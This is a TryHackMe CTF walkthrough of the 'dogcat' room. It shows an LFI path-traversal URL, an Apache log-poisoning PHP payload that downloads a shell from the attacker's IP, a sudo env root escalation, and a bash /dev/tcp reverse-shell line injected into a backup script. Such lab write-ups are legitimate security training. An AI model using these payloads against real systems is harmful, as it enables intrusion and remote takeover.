SecOnset
Published in

SecOnset

DogCat Write-up (TryHackMe)

Hey Guys! This is a write up for the room dogcat on TryHackMe.

https://tryhackme.com/room/dogcat

Dogcat is a medium level room and to solve this you need to have knowledge of LFI(Local File Inclusion), PHP and some linux basics with privilege escalation .

We’ll start our reconnaissance by port scanning with nmap by checking the open ports and services running on them.

nmap -sV -sC -oN nmap <IP>

# Nmap 7.91 scan initiated Wed Jan  6 00:16:56 2021 as: nmap -sV -sC -oN nmap 10.10.70.53
Nmap scan report for 10.10.70.53
Host is up (0.14s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 24:31:19:2a:b1:97:1a:04:4e:2c:36:ac:84:0a:75:87 (RSA)
| 256 21:3d:46:18:93:aa:f9:e7:c9:b5:4c:0f:16:0b:71:e1 (ECDSA)
|_ 256 c1:fb:7d:73:2b:57:4a:8b:dc:d7:6f:49:bb:3b:d0:20 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: dogcat
1000/tcp filtered cadlock
1583/tcp filtered simbaexpress
5631/tcp filtered pcanywheredata
16012/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jan 6 00:17:34 2021 -- 1 IP address (1 host up) scanned in 37.93 seconds

We can see port 80 running which means its a web server, Lets have a look at it.

Its a pretty simple web page, we have got 2 buttons to click on with a question “What would you like to see?”, I’m gonna go with “A Cat”.

Aha! That’s a cute kitten with an interesting URL. By looking around we now know that these options are nothing but php files which show a photography of the respective name.

If we try to insert anything except “dog” or “cat” we get a page which says only dogs and cats allowed. So we should try going back from the directory of the php files and try to get read access.

/?view=cat../../../../../../etc/passwd&ext=

By adding the line above to the URL, we get the /etc/passwd file as our response. “&ext=” was used to ignore surfix “.php” extension, without it we would keep getting errors because in the back-end whatever we search for would have the extension “.php” and we don’t want that.

Next, we will use Apache Log poisoning to gain a shell. To learn more about it checkout the amazing blog in the link below.

https://www.hackingarticles.in/apache-log-poisoning-through-lfi

According to the blog the access logs are located in the “/var/log/apache2/access.log”. To abuse it we need to intercept this request and make some changes in it as shown in the image below. We will add this php code given below in front of User-Agent. Keep in mind that before sending the request run a python server at the location of your php-reverse-shell file.

<?php file_put_contents(‘shell.php’, file_get_contents(‘http://10.9.104.127:9090/shell.php’))?>

We can confirm that our file is been uploaded by looking at our python server, after that we need to run netcat to listen for the reverse shell.

To finally gain a shell we need to run the php reverse shell file on the web server.

Doing so will get us a shell. looking around we can see we don’t have users to find flags at, however it is a web server so we can look in /var/www. we found our flag1 and flag2 in those directories.

We need two more flags so let’s escalate our privileges, so that it would be much easier to look around. To do so we’ll check to exploit sudo rights by entering the command

sudo -l

It says that we can use root without any password to run env as root. Pretty handy for us. Let’s check GTFOBins and exploit it.

sudo -u root /usr/bin/env /bin/sh

Yay we got a shell as root. We also found the flag3 in the root directory.

Flag4 is a tricky one. While looking around we stumbled on some backup files in /opt/backup.

We got two files here, one is a tar file and another one is a script. The script is for backing up the root/container to the tar file. To gain access we need to edit the script a bit.

echo “#!/bin/bash” > backup.sh;echo “bash -i >& /dev/tcp/10.9.104.127/4444 0>&1” >> backup.sh

Now doing so will help us get a full fledged bash shell. run netcan to listen on the port 4444 and then run the script.

Yay we have successfully completed the room dogcat.

Thank you for reading this walk-through. If you liked it please like and share it with you hacker buddies.

--

--

--

Offensive Security Writeups

Recommended from Medium

CSRF (Low-Security) | DVWA Writeup

93% of Security Professionals Lack Proper Tools to Detect Cyberthreats

Better Aadhaar with Blockchain

How to root IBall Andi 4. 5 k6 plus

Root LG Phone

HTB: Nibbles

How do I verify my account Gemini?

One end point = Two High severity bugs

Example for idor

How i would have taken over 5 crore accounts

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Mihir Walia

Mihir Walia

Penetration tester | Ethical Hacker

More from Medium

Intro to Windows — TryHackMe Walkthrough

Thompsom THM Writeup

TryHackMe | Dig Dug Walkthrough

Dig Dug room image

HackTheBox-Bolt